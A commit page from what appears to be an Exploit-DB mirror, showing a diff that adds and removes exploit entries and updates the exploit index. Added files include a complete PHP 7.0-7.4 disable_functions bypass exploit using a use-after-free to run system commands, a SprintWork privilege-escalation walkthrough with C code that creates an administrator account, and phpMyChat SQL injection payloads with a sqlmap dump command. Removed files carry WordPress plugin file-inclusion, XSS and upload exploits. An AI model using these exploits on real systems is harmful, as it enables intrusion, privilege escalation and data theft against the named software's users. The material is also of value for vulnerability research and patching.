bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-02-15

Browse source 
21 changes to exploits/shellcodes

PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass
PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions  Bypass

PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass
PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / disable_functions Bypass

PHP 5.x COM - Safe Mode / Disable Functions Bypass
PHP 5.x COM - Safe Mode / disable_functions Bypass

PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass
PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass
HomeGuard Pro 9.3.1 - Insecure Folder Permissions
EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
SprintWork 2.3.1 - Local Privilege Escalation
Windows Kernel  - Information Disclosure
PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass

OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution

PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection
PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection

PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library
PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' disable_functions Bypass / Load Dynamic Library

Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass
Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass

PHP 7.1 < 7.3 - 'json serializer' Disable Functions Bypass
PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass

PHP 7.0 < 7.3 (Unix) - 'gc' Disable Functions Bypass
PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass

VehicleWorkshop 1.0 - 'bookingid' SQL Injection

Wordpress Plugin tutor.1.5.3 - Local File Inclusion
Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
phpMyChat Plus 1.98 - 'pmc_username' SQL Injection

WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
This commit is contained in:
Offensive Security 2020-02-15 05:01:54 +00:00
parent 21abbd7054
commit 53517327e7
14 changed files with 498 additions and 173 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

0
exploits/freebsd/remote/48051.pl → exploits/openbsd/remote/48051.pl
View file

218
exploits/php/local/48072.php Normal file
View file

@ -0,0 +1,218 @@
<?php
# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=76047
# debug_backtrace() returns a reference to a variable
# that has been destroyed, causing a UAF vulnerability.
#
# This exploit should work on all PHP 7.0-7.4 versions
# released as of 30/01/2020.
#
# Author: https://github.com/mm0r1
pwn("uname -a");
function pwn($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace(); # ;)
if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
# str_shuffle prevents opcache string interning
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
# fake value
write($abc, 0x60, 2);
write($abc, 0x70, 6);
# fake reference
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
($helper->b)($cmd);
exit();
}

28
exploits/php/webapps/48023.txt
View file

@ -1,28 +0,0 @@
# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Data: 2020-02-06
# Exploit Author: Mehran Feizi
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A
=========
Vulnerable Page:
=========
/viewtestdrive.php
==========
Vulnerable Source:
==========
Line6: if(isset($_GET['testid']))
Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");
Line11: if(isset($_GET['testbid']))
Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");
Line16: if(isset($_GET['testbida']))
Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");
=========
POC:
=========
http://site.com/viewtestdrive.php?bookingid=[SQL]

39
exploits/php/webapps/48058.txt
View file

@ -1,39 +0,0 @@
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================

18
exploits/php/webapps/48059.txt
View file

@ -1,18 +0,0 @@
# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================

14
exploits/php/webapps/48061.txt
View file

@ -1,14 +0,0 @@
# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/wordfence/
==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================

39
exploits/php/webapps/48062.txt
View file

@ -1,39 +0,0 @@
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-11
# vendor home page: https://wordpress.org/plugins/contact-form-7/
Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null;
132: $new_file = path_join($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
131: $filename = wp_unique_filename($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
126: $filename = wpcf7_antiscript_file_name ($filename);
125: $filename = wpcf7_canonicalize ($filename, 'as-is');
124: $filename = $file['name'];
82: $file = $_FILES[$name] : null;
82: $file = $_FILES[$name] : null;
78: ⇓ function wpcf7_file_validation_filter($result, $tag)
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

19
exploits/php/webapps/48065.txt
View file

@ -1,19 +0,0 @@
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/
Vulnerable Page:
/class-admin-upgrade.php
Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>

47
exploits/php/webapps/48066.txt Normal file
View file

@ -0,0 +1,47 @@
# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Date: 2020-02-13
# Exploit Author: J3rryBl4nks
# Vendor Homepage: http://ciprianmp.com/latest/
# Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/
# Version MyChat Plus 1.98
# Tested on Windows 10/Kali Rolling
# The phpMyChat Plus 1.98 application is vulnerable to Sql Injection
# (Boolean based blind, Error-based, time-based blind) on the deluser.php page
# through the pmc_user parameter.
# POC code:
# Capture the request through Burpsuite:
POST /plus/deluser.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/plus/deluser.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9
Upgrade-Insecure-Requests: 1
L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In
# Then use sqlmap to get the user tables:
sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username
Parameter: pmc_username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In

28
exploits/windows/local/48068.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
# Version 9.3.1
# Tested On: Windows 10 (32-bit)
# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions
## Service Information (Unquoted Service Path)
C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
Name PathName StartMode StartName
HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem
HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem
HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem
HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem
## Insecure Folder Permission
C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)
## Insecure File/Service Permission
C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)

34
exploits/windows/local/48069.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-13
# Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows
# Software Link :https://ftp.epson.com/drivers/epson16189.exe
# SEIKO EPSON CORP
# Tested Version: 2.81
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """
EMP_NSWLSV EMP_NSWLSV C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe Auto
C:\>sc qc "EMP_NSWLSV"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EMP_NSWLSV
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EMP_NSWLSV
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.

128
exploits/windows/local/48070.txt Normal file
View file

@ -0,0 +1,128 @@
# Exploit Title: SprintWork 2.3.1 - Local Privilege Escalation
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe
# Version: 2.3.1
# Tested On: Windows 10 (32-bit)
# Vulnerability Overview:
# SprintWork v2.3.1 (x86) suffers from insecure file & service & folder permissions, unquoted service paths,
# and a missing executable for one of the two Service it installs; to be ran as 'LocalSystem'.
# This allows any local user to gain persistent code-execution as 'LocalSystem'.
# Both the 32bit & 64bit build of SprintWork v2.3.1 create the services 'SP52 AMC' & 'SprintWork TM VI', with the "StartMode" set to 'Auto', to be ran as 'LocalSystem'; these services will ran every time the computer starts. The 'SP52 AMC' Service is set to use the 'nvlsimw.exe' file. On the 32bit version, the 'nvlsimw.exe' file is never created. This, in combination with its other vulnerabilities, results in persistent code-execution for any local user as 'LocalSystem'.
# See Proof of Concept below for full details.
# About:
# "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity
# + Block or time restrict social networks, online games or any website
# - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time.
# + Block or time restrict games and programs
# - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day.
# + Detailed activity monitoring and reporting
# - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits.
# + Selective user monitoring and blocking.
# - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers.
# + Wildcard support
# - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain.
# + Multiple website blocking lists.
# - Block or set time restrictions collectively for groups of websites.
# + Cannot be bypassed, deleted or disabled.
# - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password."
# - https://veridium.net/sprintwork/
## Service Information (there is also an Unquoted Service Path)
C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork
SP52 AMC C:\Program Files\SprintWork\nvlsimw.exe Auto LocalSystem
SprintWork TM VI C:\Program Files\SprintWork\nvlsim.exe Auto LocalSystem
## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service
C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe"
11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE
12/25/2019 02:47 PM 1,202,688 qcden.exe
12/25/2019 02:47 PM 14,436,864 SprintWork.exe
11/23/2019 10:20 PM 1,557,504 txew.exe
## Insecure Folder Permission
C:\>icacls "C:\Program Files\SprintWork"
C:\Program Files\SprintWork BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
## Insecure File/Service Permission
C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE"
C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F)
## Local Privilege Escalation Proof of Concept
#0. Download & install SprintWork v2.3.1 (x86) on Windows 10 32bit Operating System
#1. Create low privileged user
C:\Windows\system32>net user lowpriv password /add
#2. Change to lowpriv User
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name lowPrivUser
Local Group Memberships *Users
Global Group memberships *None
C:\>whoami
mycomputer\lowprivuser
#3. Create malicious binary on Kali Linux
3.1) Download dependencies
root@kali# apt install gcc-mingw-w64-i686 wine64 -y
3.2) Create Add Admin User C Code
root@kali# cat addAdmin.c
#include<windows.h>
int main(void){
system("net user adminpriv mypassword /add");
system("net localgroup Administrators adminpriv /add");
return 0;
}
3.3) Compile Code
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe
#4. Transfer created 'nvlsimw.exe' to the Windows Host
#5. Move the created 'nvlsimw.exe' binary to the 'C:\Program Files\SprintWorks\' Directory
C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\"
1 file(s) moved.
C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim
11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE
02/13/2020 06:07 PM 288,469 nvlsimw.exe
#6. Verify localgroup 'Administrators' members
C:\Users\lowpriv>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
boku
#6. Reboot the Computer
C:\Users\lowpriv>shutdown /r /t 0
#7. Verify user 'adminpriv' was created & added to the localgroup 'Administrators'
C:\>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
adminpriv
boku
C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group
User name adminpriv
Account active Yes
Password last set ?2/?13/?2020 6:18:03 PM
Password expires Never
Password changeable ?2/?13/?2020 6:18:03 PM
Password required Yes
Local Group Memberships *Administrators *Users
Global Group memberships *None

27
exploits/windows/local/48071.md Normal file
View file

@ -0,0 +1,27 @@
# PoC for the SWAPGS attack ([CVE-2019-1125](https://nvd.nist.gov/vuln/detail/CVE-2019-1125))
This holds the sources for the SWAPGS attack PoC publicly shown at Black Hat USA, 2019.
## Contents
* leakgsbkva - variant 1 (look for random values in kernel memory; limited to PE kernel image header)
* leakgsbkvat - variant 2 (extract random values from kernel memory; limited to PE kernel image header)
* whitepaper
* Black Hat USA 2019 presentation
## Prerequisites
1. Visual Studio 2015
2. Unpatched Windows x64 (7 or newer)
## Authors
* Andrei Vlad LUȚAȘ
* Dan Horea LUȚAȘ
## Additional resources
[Video Recording of presentation at Black Hat USA, 2019](https://www.youtube.com/watch?v=uBPry7jcfBE)
Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48071.zip

32
files_exploits.csv
View file

@ -7162,7 +7162,7 @@ id,file,description,date,author,type,platform,port
4178,exploits/windows/local/4178.txt,"Symantec AntiVirus - 'symtdi.sys' Local Privilege Escalation",2007-07-12,"Zohiartze Herce",local,windows,
4203,exploits/multiple/local/4203.sql,"Oracle 9i/10g - Evil Views Change Passwords",2007-07-19,bunker,local,multiple,
4204,exploits/windows/local/4204.php,"PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow",2007-07-20,shinnai,local,windows,
4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass",2007-07-24,shinnai,local,windows,
4218,exploits/windows/local/4218.php,"PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / disable_functions Bypass",2007-07-24,shinnai,local,windows,
4229,exploits/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",local,windows,
4231,exploits/aix/local/4231.c,"IBM AIX 5.3 SP6 - Capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,local,aix,
4232,exploits/aix/local/4232.sh,"IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,local,aix,
@ -7189,9 +7189,9 @@ id,file,description,date,author,type,platform,port
4460,exploits/linux_x86-64/local/4460.c,"Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",local,linux_x86-64,
4515,exploits/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,local,solaris,
4516,exploits/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,local,solaris,
4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass",2007-10-11,shinnai,local,windows,
4517,exploits/windows/local/4517.php,"PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / disable_functions Bypass",2007-10-11,shinnai,local,windows,
4531,exploits/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,local,windows,
4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / Disable Functions Bypass",2007-10-22,shinnai,local,windows,
4553,exploits/windows/local/4553.php,"PHP 5.x COM - Safe Mode / disable_functions Bypass",2007-10-22,shinnai,local,windows,
4564,exploits/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,local,multiple,
4570,exploits/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,local,multiple,
4571,exploits/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,local,multiple,
@ -10594,7 +10594,7 @@ id,file,description,date,author,type,platform,port
45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux,
45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux,
45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos,
45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux,
45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux,
45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
@ -10958,6 +10958,11 @@ id,file,description,date,author,type,platform,port
48056,exploits/windows/local/48056.py,"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow",2020-02-12,ZwX,local,windows,
48057,exploits/windows/local/48057.txt,"HP System Event Utility - Local Privilege Escalation",2020-02-12,hyp3rlinx,local,windows,
48060,exploits/windows/local/48060.txt,"OpenTFTP 1.66 - Local Privilege Escalation",2020-02-13,boku,local,windows,
48068,exploits/windows/local/48068.txt,"HomeGuard Pro 9.3.1 - Insecure Folder Permissions",2020-02-14,boku,local,windows,
48069,exploits/windows/local/48069.txt,"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path",2020-02-14,"Roberto Piña",local,windows,
48070,exploits/windows/local/48070.txt,"SprintWork 2.3.1 - Local Privilege Escalation",2020-02-14,boku,local,windows,
48071,exploits/windows/local/48071.md,"Windows Kernel - Information Disclosure",2020-01-27,Bitdefender,local,windows,
